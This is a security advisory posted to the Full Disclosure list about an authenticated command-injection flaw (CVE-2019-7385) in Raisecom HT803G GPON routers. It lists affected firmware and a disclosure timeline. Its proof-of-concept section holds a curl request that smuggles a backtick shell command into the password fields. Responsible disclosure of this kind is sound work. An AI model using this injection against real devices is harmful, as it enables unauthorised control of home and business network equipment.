[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] KSA-Dev-006:CVE-2019-7385: Authenticated remote code execution on Multiple Raisecom GPON Devices

=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad

Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-006


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix 
of residential access services including high speed data, IPTV, voice and CATV 
services compliant with the ITU-T G.984 standard. In particular, the Raisecom 
ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, 
wireless router accessing and convenient USB2.0 home network storage 
connections for various application scenarios, such as residential triple-play 
service and business connections. The GPON ONT series offer flexible choices in 
terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet 
ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 
802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and 
monitoring functionality, and the GPON series can be managed under the Raisecom 
NView platform.


Description: 
============
An authenticated shell command injection issue has been discovered in  Raisecom 
ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware 
version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the 
newpass and confpass parameters in /bin/WebMGR are used in a system call in the 
firmware. Because there is no user input validation, this leads to 
authenticated code execution on the device.

[Additional_information]

The value of newpass and confpass in /bin/WebMGR  parameter is parse to system 
call in the Firmware  and since their is no user input validation this leads to 
authenticated code execution on device

Vulnerability Class:
====================
Authenticated Shell Command Injection


Attack Type
===========
 Local


Impact Code execution
=====================
 true


Attack Vectors
==============
TO exploit this vulnerability one needs to parse the correct request to the 
device or they one needs to visit the crafted Page


How to Reproduce: (POC):
========================

curl -i -s -k  -X 'POST' \
    -H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 
'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 
(Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: 
http://192.168.1.1/password.asp' \
    --data-binary 
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
 \
    'http://192.168.1.1/boaform/formPasswordSetup'

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@xxxxxx
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/